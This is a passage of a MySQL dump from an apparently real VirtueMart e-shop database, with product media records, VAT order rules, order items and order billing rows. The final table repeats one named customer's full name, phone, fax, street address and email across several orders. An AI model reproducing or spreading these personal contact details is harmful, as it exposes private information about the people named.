00:00:00',0),(127,1,'AM100_en_18_0101.pdf_1','','','','application/pdf','product','images/stories/virtuemart/product/AM100_en_18_0101.pdf','',0,1,0,'','',0,1,'2020-11-26 05:59:39',676,'2020-11-26 05:59:39',676,'0000-00-00 00:00:00',0),(128,1,'AM100_en_18_01016.pdf_1','Catalog','','','application/pdf','product','images/stories/virtuemart/product/AM100_en_18_01016.pdf','',0,1,0,'','',0,1,'2020-11-26 06:09:28',676,'2020-11-26 06:09:28',676,'0000-00-00 00:00:00',0),(129,1,'AM100_en_18_01015.pdf_1','','Catalog','','application/pdf','product','images/stories/virtuemart/product/AM100_en_18_01015.pdf','',0,1,0,'','',0,1,'2020-11-26 06:11:28',676,'2020-11-26 06:11:28',676,'0000-00-00 00:00:00',0),(130,1,'AM100_en_18_01011.pdf_1','CATALOG2','CATALOG','','application/pdf','product','images/stories/virtuemart/product/AM100_en_18_01011.pdf','',0,1,0,'','',0,1,'2020-11-26 06:44:21',676,'2020-11-26 06:44:21',676,'0000-00-00 00:00:00',0),(131,1,'NPM-W2S_en_20_0101.pdf_1','','','','application/pdf','product','images/stories/virtuemart/product/NPM-W2S_en_20_0101.pdf','',0,1,0,'','',0,1,'2020-11-26 06:51:02',676,'2020-11-26 06:51:02',676,'0000-00-00 00:00:00',0),(132,1,'NPM-D3A_en_20_0803.pdf_1','','','','application/pdf','product','images/stories/virtuemart/product/NPM-D3A_en_20_0803.pdf','',0,1,0,'','',0,1,'2020-11-26 06:52:04',676,'2020-11-26 06:52:04',676,'0000-00-00 00:00:00',0),(133,1,'NPM-W2_en_20_1001.pdf_1','','','','application/pdf','product','images/stories/virtuemart/product/NPM-W2_en_20_1001.pdf','',0,1,0,'','',0,1,'2020-11-26 06:52:44',676,'2020-11-26 06:52:44',676,'0000-00-00 00:00:00',0),(134,1,'spg_en_20_0101.pdf_1','','','','application/pdf','product','images/stories/virtuemart/product/spg_en_20_0101.pdf','',0,1,0,'','',0,1,'2020-11-26 06:53:05',676,'2020-11-26 06:53:05',676,'0000-00-00 00:00:00',0),(135,1,'NPM-VF_en_20_0101.pdf_1','','No image set ','','application/pdf','product','images/stories/virtuemart/product/NPM-VF_en_20_0101.pdf','',0,1,0,'','',0,1,'2020-11-26 06:53:34',676,'2020-11-26 06:53:34',676,'0000-00-00 00:00:00',0),(136,1,'LPS-C_en_20_0101.pdf_1','','','','application/pdf','product','images/stories/virtuemart/product/LPS-C_en_20_0101.pdf','',0,1,0,'','',0,1,'2020-11-26 06:53:57',676,'2020-11-26 06:53:57',676,'0000-00-00 00:00:00',0),(137,1,'rl132_en_20_0101.pdf_1','','','','application/pdf','product','images/stories/virtuemart/product/rl132_en_20_0101.pdf','',0,1,0,'','',0,1,'2020-11-26 06:54:16',676,'2020-11-26 06:54:16',676,'0000-00-00 00:00:00',0),(138,1,'av132_en_20_0101.pdf_1','','','','application/pdf','product','images/stories/virtuemart/product/av132_en_20_0101.pdf','',0,1,0,'','',0,1,'2020-11-26 06:54:35',676,'2020-11-26 06:54:35',676,'0000-00-00 00:00:00',0),(139,1,'rg131.png_1','','','','image/png','product','images/stories/virtuemart/product/rg131.png','',0,0,0,'','',0,1,'2020-11-26 07:29:21',676,'2020-11-26 08:10:18',676,'0000-00-00 00:00:00',0),(140,1,'rg131_en_20_0101.pdf_1','','','','application/pdf','product','images/stories/virtuemart/product/rg131_en_20_0101.pdf','',0,0,0,'','',0,1,'2020-11-26 07:29:46',676,'2020-11-26 07:29:46',676,'0000-00-00 00:00:00',0),(141,1,'rg131_en_20_01017.pdf_1','','','','application/pdf','product','images/stories/virtuemart/product/rg131_en_20_01017.pdf','',0,1,0,'','',0,1,'2020-11-26 07:58:08',676,'2020-11-26 07:58:08',676,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_medias` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_migration_oldtonew_ids`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_migration_oldtonew_ids`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_migration_oldtonew_ids` (
  `id` smallint unsigned NOT NULL AUTO_INCREMENT,
  `cats` longblob,
  `catsxref` blob,
  `manus` longblob,
  `mfcats` blob,
  `shoppergroups` longblob,
  `products` longblob,
  `products_start` int DEFAULT NULL,
  `orderstates` blob,
  `orders` longblob,
  `attributes` longblob,
  `relatedproducts` longblob,
  `orders_start` int DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb3 COMMENT='xref table for vm1 ids to vm2 ids';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_migration_oldtonew_ids`
--

LOCK TABLES `fz6t4_virtuemart_migration_oldtonew_ids` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_migration_oldtonew_ids` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_migration_oldtonew_ids` VALUES (1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL);
/*!40000 ALTER TABLE `fz6t4_virtuemart_migration_oldtonew_ids` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_modules`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_modules`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_modules` (
  `module_id` int unsigned NOT NULL AUTO_INCREMENT,
  `module_name` char(255) DEFAULT NULL,
  `module_description` varchar(15359) DEFAULT NULL,
  `module_perms` char(255) DEFAULT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `is_admin` enum('0','1') NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`module_id`),
  KEY `module_name` (`module_name`),
  KEY `ordering` (`ordering`),
  KEY `published` (`published`)
) ENGINE=MyISAM AUTO_INCREMENT=14 DEFAULT CHARSET=utf8mb3 COMMENT='VirtueMart Core Modules, not: Joomla modules';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_modules`
--

LOCK TABLES `fz6t4_virtuemart_modules` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_modules` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_modules` VALUES (1,'product','Here you can administer your online catalog of products.  Categories , Products (view=product), Attributes  ,Product Types      Product Files (view=media), Inventory  , Calculation Rules ,Customer Reviews  ','storeadmin,admin',1,'1',1),(2,'order','View Order and Update Order Status:    Orders , Coupons , Revenue Report ,Shopper , Shopper Groups ','admin,storeadmin',1,'1',2),(3,'manufacturer','Manage the manufacturers of products in your store.','storeadmin,admin',1,'1',3),(4,'store','Store Configuration: Store Information, Payment Methods , Shipment, Shipment Rates','storeadmin,admin',1,'1',4),(5,'configuration','Configuration: shop configuration , currencies (view=currency), Credit Card List, Countries, userfields, order status  ','admin,storeadmin',1,'1',5),(6,'msgs','This module is unprotected an used for displaying system messages to users.  We need to have an area that does not require authorization when things go wrong.','none',0,'0',99),(7,'shop','This is the Washupito store module.  This is the demo store included with the VirtueMart distribution.','none',1,'0',99),(8,'store','Store Configuration: Store Information, Payment Methods , Shipment, Shipment Rates','storeadmin,admin',1,'1',4),(9,'account','This module allows shoppers to update their account information and view previously placed orders.','shopper,storeadmin,admin,demo',1,'0',99),(10,'checkout','','none',0,'0',99),(11,'tools','Tools','admin',1,'1',8),(13,'zone','This is the zone-shipment module. Here you can manage your shipment costs according to Zones.','admin,storeadmin',0,'1',11);
/*!40000 ALTER TABLE `fz6t4_virtuemart_modules` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_order_calc_rules`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_order_calc_rules`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_order_calc_rules` (
  `virtuemart_order_calc_rule_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_calc_id` int unsigned DEFAULT NULL,
  `virtuemart_order_id` int unsigned DEFAULT NULL,
  `virtuemart_vendor_id` int unsigned NOT NULL DEFAULT '1',
  `virtuemart_order_item_id` int DEFAULT NULL,
  `calc_rule_name` varchar(64) NOT NULL DEFAULT '' COMMENT 'NAME OF THE RULE',
  `calc_kind` varchar(16) NOT NULL DEFAULT '' COMMENT 'DISCOUNT/TAX/MARGIN/COMMISSION',
  `calc_mathop` varchar(16) NOT NULL DEFAULT '' COMMENT 'DISCOUNT/TAX/MARGIN/COMMISSION',
  `calc_amount` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `calc_result` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `calc_value` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `calc_currency` int DEFAULT NULL,
  `calc_params` varchar(15359) NOT NULL DEFAULT '',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_order_calc_rule_id`),
  KEY `virtuemart_calc_id` (`virtuemart_calc_id`),
  KEY `virtuemart_order_id` (`virtuemart_order_id`),
  KEY `virtuemart_vendor_id` (`virtuemart_vendor_id`)
) ENGINE=MyISAM AUTO_INCREMENT=40 DEFAULT CHARSET=utf8mb3 COMMENT='Stores all calculation rules which are part of an order';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_order_calc_rules`
--

LOCK TABLES `fz6t4_virtuemart_order_calc_rules` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_order_calc_rules` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_order_calc_rules` VALUES (1,0,1,1,NULL,'','payment','',0.00000,0.00000,0.00000,0,'','2014-08-07 06:45:52',677,'2014-08-07 06:45:52',677,'0000-00-00 00:00:00',0),(2,0,1,1,NULL,'','shipment','',0.00000,0.00000,0.00000,0,'','2014-08-07 06:45:52',677,'2014-08-07 06:45:52',677,'0000-00-00 00:00:00',0),(3,1,2,1,2,'KDV_18','VatTax','+%',8.64756,60.53292,18.00000,144,'','2014-08-07 08:17:57',677,'2014-08-07 08:17:57',677,'0000-00-00 00:00:00',0),(4,1,2,1,3,'KDV_18','VatTax','+%',8.64756,60.53292,18.00000,144,'','2014-08-07 08:17:57',677,'2014-08-07 08:17:57',677,'0000-00-00 00:00:00',0),(5,0,2,1,NULL,'','payment','',0.00000,0.00000,0.00000,0,'','2014-08-07 08:17:57',677,'2014-08-07 08:17:57',677,'0000-00-00 00:00:00',0),(6,0,2,1,NULL,'','shipment','',0.00000,0.00000,0.00000,0,'','2014-08-07 08:17:57',677,'2014-08-07 08:17:57',677,'0000-00-00 00:00:00',0),(7,1,3,1,4,'KDV_18','VatTax','+%',6.24546,87.43644,18.00000,144,'','2014-08-07 08:41:55',677,'2014-08-07 08:41:55',677,'0000-00-00 00:00:00',0),(8,0,3,1,NULL,'','payment','',0.00000,0.00000,0.00000,0,'','2014-08-07 08:41:55',677,'2014-08-07 08:41:55',677,'0000-00-00 00:00:00',0),(9,0,3,1,NULL,'','shipment','',0.00000,0.00000,0.00000,0,'','2014-08-07 08:41:55',677,'2014-08-07 08:41:55',677,'0000-00-00 00:00:00',0),(10,1,4,1,5,'KDV_18','VatTax','+%',8.64756,8.64756,18.00000,144,'','2014-08-08 07:07:48',677,'2014-08-08 07:07:48',677,'0000-00-00 00:00:00',0),(11,1,4,1,NULL,'KDV_18','payment','+%',0.00000,0.00000,18.00000,144,'','2014-08-08 07:07:48',677,'2014-08-08 07:07:48',677,'0000-00-00 00:00:00',0),(12,0,4,1,NULL,'','shipment','',0.00000,0.00000,0.00000,0,'','2014-08-08 07:07:48',677,'2014-08-08 07:07:48',677,'0000-00-00 00:00:00',0),(13,1,5,1,6,'KDV_18','VatTax','+%',8.64756,8.64756,18.00000,144,'','2014-08-08 07:08:53',677,'2014-08-08 07:08:53',677,'0000-00-00 00:00:00',0),(14,1,5,1,NULL,'KDV_18','payment','+%',0.00000,0.00000,18.00000,144,'','2014-08-08 07:08:53',677,'2014-08-08 07:08:53',677,'0000-00-00 00:00:00',0),(15,0,5,1,NULL,'','shipment','',0.00000,0.00000,0.00000,0,'','2014-08-08 07:08:53',677,'2014-08-08 07:08:53',677,'0000-00-00 00:00:00',0),(16,1,6,1,7,'KDV_18','VatTax','+%',8.64756,8.64756,18.00000,144,'','2014-08-08 07:10:26',677,'2014-08-08 07:10:26',677,'0000-00-00 00:00:00',0),(17,1,6,1,NULL,'KDV_18','payment','+%',0.00000,0.00000,18.00000,144,'','2014-08-08 07:10:26',677,'2014-08-08 07:10:26',677,'0000-00-00 00:00:00',0),(18,0,6,1,NULL,'','shipment','',0.00000,0.00000,0.00000,0,'','2014-08-08 07:10:26',677,'2014-08-08 07:10:26',677,'0000-00-00 00:00:00',0),(19,1,7,1,8,'KDV_18','VatTax','+%',8.64756,8.64756,18.00000,144,'','2014-08-08 07:11:11',677,'2014-08-08 07:11:11',677,'0000-00-00 00:00:00',0),(20,1,7,1,NULL,'KDV_18','payment','+%',0.00000,0.00000,18.00000,144,'','2014-08-08 07:11:11',677,'2014-08-08 07:11:11',677,'0000-00-00 00:00:00',0),(21,0,7,1,NULL,'','shipment','',0.00000,0.00000,0.00000,0,'','2014-08-08 07:11:11',677,'2014-08-08 07:11:11',677,'0000-00-00 00:00:00',0),(22,1,8,1,9,'KDV_18','VatTax','+%',8.64756,8.64756,18.00000,144,'','2014-08-08 07:11:40',677,'2014-08-08 07:11:40',677,'0000-00-00 00:00:00',0),(23,1,8,1,NULL,'KDV_18','payment','+%',0.00000,0.00000,18.00000,144,'','2014-08-08 07:11:40',677,'2014-08-08 07:11:40',677,'0000-00-00 00:00:00',0),(24,0,8,1,NULL,'','shipment','',0.00000,0.00000,0.00000,0,'','2014-08-08 07:11:40',677,'2014-08-08 07:11:40',677,'0000-00-00 00:00:00',0),(25,1,9,1,10,'KDV_18','VatTax','+%',8.64756,8.64756,18.00000,144,'','2014-08-08 07:12:14',677,'2014-08-08 07:12:14',677,'0000-00-00 00:00:00',0),(26,1,9,1,NULL,'KDV_18','payment','+%',0.00000,0.00000,18.00000,144,'','2014-08-08 07:12:14',677,'2014-08-08 07:12:14',677,'0000-00-00 00:00:00',0),(27,0,9,1,NULL,'','shipment','',0.00000,0.00000,0.00000,0,'','2014-08-08 07:12:14',677,'2014-08-08 07:12:14',677,'0000-00-00 00:00:00',0),(28,1,10,1,11,'KDV_18','VatTax','+%',8.64756,8.64756,18.00000,144,'','2014-08-08 07:13:15',677,'2014-08-08 07:13:15',677,'0000-00-00 00:00:00',0),(29,1,10,1,NULL,'KDV_18','payment','+%',0.00000,0.00000,18.00000,144,'','2014-08-08 07:13:15',677,'2014-08-08 07:13:15',677,'0000-00-00 00:00:00',0),(30,0,10,1,NULL,'','shipment','',0.00000,0.00000,0.00000,0,'','2014-08-08 07:13:15',677,'2014-08-08 07:13:15',677,'0000-00-00 00:00:00',0),(31,1,11,1,12,'KDV_18','VatTax','+%',6.24546,31.22730,18.00000,144,'','2014-08-08 07:15:34',677,'2014-08-08 07:15:34',677,'0000-00-00 00:00:00',0),(32,1,11,1,NULL,'KDV_18','payment','+%',0.00000,0.00000,18.00000,144,'','2014-08-08 07:15:34',677,'2014-08-08 07:15:34',677,'0000-00-00 00:00:00',0),(33,0,11,1,NULL,'','shipment','',0.00000,0.00000,0.00000,0,'','2014-08-08 07:15:34',677,'2014-08-08 07:15:34',677,'0000-00-00 00:00:00',0),(34,1,12,1,13,'KDV_18','VatTax','+%',6.24546,31.22730,18.00000,144,'','2014-08-08 07:16:25',677,'2014-08-08 07:16:25',677,'0000-00-00 00:00:00',0),(35,1,12,1,NULL,'KDV_18','payment','+%',0.00000,0.00000,18.00000,144,'','2014-08-08 07:16:25',677,'2014-08-08 07:16:25',677,'0000-00-00 00:00:00',0),(36,0,12,1,NULL,'','shipment','',0.00000,0.00000,0.00000,0,'','2014-08-08 07:16:25',677,'2014-08-08 07:16:25',677,'0000-00-00 00:00:00',0),(37,1,13,1,14,'KDV_18','VatTax','+%',6.24546,31.22730,18.00000,144,'','2014-08-08 07:16:57',677,'2014-08-08 07:16:57',677,'0000-00-00 00:00:00',0),(38,1,13,1,NULL,'KDV_18','payment','+%',0.00000,0.00000,18.00000,144,'','2014-08-08 07:16:57',677,'2014-08-08 07:16:57',677,'0000-00-00 00:00:00',0),(39,0,13,1,NULL,'','shipment','',0.00000,0.00000,0.00000,0,'','2014-08-08 07:16:57',677,'2014-08-08 07:16:57',677,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_order_calc_rules` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_order_histories`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_order_histories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_order_histories` (
  `virtuemart_order_history_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_order_id` int unsigned NOT NULL DEFAULT '0',
  `order_status_code` char(1) NOT NULL DEFAULT '0',
  `customer_notified` tinyint(1) NOT NULL DEFAULT '0',
  `comments` varchar(15359) DEFAULT NULL,
  `paid` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `o_hash` varchar(33) DEFAULT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_order_history_id`),
  KEY `virtuemart_order_id` (`virtuemart_order_id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb3 COMMENT='Stores all actions and changes that occur to an order';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_order_histories`
--

LOCK TABLES `fz6t4_virtuemart_order_histories` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_order_histories` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_order_histories` VALUES (1,14,'P',0,'',0.00000,NULL,1,'2019-08-06 12:15:14',0,'2019-08-06 12:15:14',0,'0000-00-00 00:00:00',0),(2,15,'P',0,'',0.00000,'33370fad1ccd0dbdadad94754debd449',1,'2020-02-13 11:02:04',0,'2020-02-13 11:02:04',0,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_order_histories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_order_item_histories`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_order_item_histories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_order_item_histories` (
  `virtuemart_order_item_history_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_order_item_id` int unsigned NOT NULL,
  `virtuemart_order_id` int unsigned DEFAULT NULL,
  `virtuemart_vendor_id` int unsigned NOT NULL DEFAULT '1',
  `virtuemart_product_id` int DEFAULT NULL,
  `action` varchar(255) NOT NULL DEFAULT '',
  `order_item_sku` varchar(255) NOT NULL DEFAULT '',
  `order_item_name` varchar(4096) NOT NULL DEFAULT '',
  `product_quantity` int DEFAULT NULL,
  `product_item_price` decimal(15,5) DEFAULT NULL,
  `product_priceWithoutTax` decimal(15,5) DEFAULT NULL,
  `product_tax` decimal(15,5) DEFAULT NULL,
  `product_basePriceWithTax` decimal(15,5) DEFAULT NULL,
  `product_discountedPriceWithoutTax` decimal(15,5) DEFAULT NULL,
  `product_final_price` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `product_subtotal_discount` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `product_subtotal_with_tax` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `order_item_currency` int DEFAULT NULL,
  `order_status` char(1) DEFAULT NULL,
  `product_attribute` mediumtext,
  `delivery_date` varchar(200) DEFAULT NULL,
  `paid` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `oi_hash` varchar(33) DEFAULT NULL,
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_order_item_history_id`),
  KEY `virtuemart_order_id` (`virtuemart_order_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Stores all actions and changes that occur to an order item only';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_order_item_histories`
--

LOCK TABLES `fz6t4_virtuemart_order_item_histories` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_order_item_histories` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_order_item_histories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_order_items`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_order_items`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_order_items` (
  `virtuemart_order_item_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_order_id` int unsigned DEFAULT NULL,
  `virtuemart_vendor_id` int unsigned NOT NULL DEFAULT '1',
  `virtuemart_product_id` int DEFAULT NULL,
  `order_item_sku` varchar(255) NOT NULL DEFAULT '',
  `order_item_name` varchar(4096) NOT NULL DEFAULT '',
  `product_quantity` int DEFAULT NULL,
  `product_item_price` decimal(15,5) DEFAULT NULL,
  `product_priceWithoutTax` decimal(15,5) DEFAULT NULL,
  `product_tax` decimal(15,5) DEFAULT NULL,
  `product_basePriceWithTax` decimal(15,5) DEFAULT NULL,
  `product_discountedPriceWithoutTax` decimal(15,5) DEFAULT NULL,
  `product_final_price` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `product_subtotal_discount` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `product_subtotal_with_tax` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `order_item_currency` int DEFAULT NULL,
  `order_status` char(1) DEFAULT NULL,
  `product_attribute` mediumtext,
  `delivery_date` varchar(200) DEFAULT NULL,
  `paid` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `oi_hash` varchar(33) DEFAULT NULL,
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_order_item_id`),
  KEY `virtuemart_product_id` (`virtuemart_product_id`),
  KEY `virtuemart_order_id` (`virtuemart_order_id`),
  KEY `virtuemart_vendor_id` (`virtuemart_vendor_id`),
  KEY `order_status` (`order_status`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb3 COMMENT='Stores all items (products) which are part of an order';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_order_items`
--

LOCK TABLES `fz6t4_virtuemart_order_items` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_order_items` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_order_items` VALUES (1,14,1,14,'','GF-12-HC/HT',1,NULL,NULL,NULL,NULL,NULL,0.00000,0.00000,0.00000,NULL,'P','',NULL,0.00000,NULL,'2019-08-06 12:15:14',0,'2019-08-06 12:15:14',0,'0000-00-00 00:00:00',0),(2,15,1,8,'','CS40',1,NULL,NULL,NULL,NULL,NULL,0.00000,0.00000,0.00000,NULL,'P','',NULL,0.00000,'0179ab777667be9d236a6555caa002ec','2020-02-13 11:02:04',0,'2020-02-13 11:02:04',0,'0000-00-00 00:00:00',0),(3,15,1,14,'','GF-12-HC/HT',1,NULL,NULL,NULL,NULL,NULL,0.00000,0.00000,0.00000,NULL,'P','',NULL,0.00000,'77b4661855228d26278f0ea676ac8780','2020-02-13 11:02:04',0,'2020-02-13 11:02:04',0,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_order_items` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_order_userinfos`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_order_userinfos`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_order_userinfos` (
  `virtuemart_order_userinfo_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_order_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_user_id` int unsigned NOT NULL DEFAULT '0',
  `address_type` char(2) DEFAULT NULL,
  `address_type_name` char(32) DEFAULT NULL,
  `company` varchar(255) DEFAULT NULL,
  `title` char(32) DEFAULT NULL,
  `last_name` char(48) DEFAULT NULL,
  `first_name` char(48) DEFAULT NULL,
  `middle_name` char(48) DEFAULT NULL,
  `phone_1` char(32) DEFAULT NULL,
  `phone_2` char(32) DEFAULT NULL,
  `fax` varchar(255) DEFAULT NULL,
  `address_1` char(64) NOT NULL DEFAULT '',
  `address_2` char(64) DEFAULT NULL,
  `city` char(64) NOT NULL DEFAULT '',
  `virtuemart_state_id` smallint unsigned NOT NULL DEFAULT '0',
  `virtuemart_country_id` smallint unsigned NOT NULL DEFAULT '0',
  `zip` char(16) NOT NULL DEFAULT '',
  `email` char(128) DEFAULT NULL,
  `agreed` tinyint(1) NOT NULL DEFAULT '0',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_order_userinfo_id`),
  KEY `virtuemart_order_id` (`virtuemart_order_id`),
  KEY `virtuemart_user_id` (`virtuemart_user_id`,`address_type`),
  KEY `address_type` (`address_type`)
) ENGINE=InnoDB AUTO_INCREMENT=22 DEFAULT CHARSET=utf8mb3 COMMENT='Stores the BillTo and ShipTo Information at order time';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_order_userinfos`
--

LOCK TABLES `fz6t4_virtuemart_order_userinfos` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_order_userinfos` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_order_userinfos` VALUES (1,1,677,'BT',NULL,'DMB Elektronik A.S.','Mr','Enunlu','Ahmet',NULL,'0212 482 8606',NULL,'0212 482 8424','Davutpaşa Caddesi, Serçekale Sokak 10/1, Topkapi 34010',NULL,'Zeytinburnu',0,215,'034010','info@dmb-elektronik.com',0,'2014-08-07 06:45:52',677,'2014-08-07 06:45:52',677,'0000-00-00 00:00:00',0),(2,2,677,'BT',NULL,'DMB Elektronik A.S.','Mr','Enunlu','Ahmet',NULL,'0212 482 8606',NULL,'0212 482 8424','Davutpaşa Caddesi, Serçekale Sokak 10/1, Topkapi 34010',NULL,'Zeytinburnu',0,215,'034010','info@dmb-elektronik.com',0,'2014-08-07 08:17:57',677,'2014-08-07 08:17:57',677,'0000-00-00 00:00:00',0),(3,3,677,'BT',NULL,'DMB Elektronik A.S.','Mr','Enunlu','Ahmet',NULL,'0212 482 8606',NULL,'0212 482 8424','Davutpaşa Caddesi, Serçekale Sokak 10/1, Topkapi 34010',NULL,'Zeytinburnu',0,215,'034010','info@dmb-elektronik.com',0,'2014-08-07 08:41:55',677,'2014-08-07 08:41:55',677,'0000-00-00 00:00:00',0),(4,4,677,'BT',NULL,'DMB Elektronik A.S.','Mr','Enunlu','Ahmet',NULL,'0212 482 8606',NULL,'0212 482 8424','Davutpaşa Caddesi, Serçekale Sokak 10/1, Topkapi 34010',NULL,'Zeytinburnu',0,215,'034010','info@dmb-elektronik.com',0,'2014-08-08 07:07:48',677,'2014-08-08 07:07:48',677,'0000-00-00 00:00:00',0),(5,5,677,'BT',NULL,'DMB Elektronik A.S.','Mr','Enunlu','Ahmet',NULL,'0212 482 8606',NULL,'0212 482 8424','Davutpaşa Caddesi, Serçekale Sokak 10/1, Topkapi 34010',NULL,'Zeytinburnu',0,215,'034010','info@dmb-elektronik.com',0,'2014-08-08 07:08:53',677,'2014-08-08 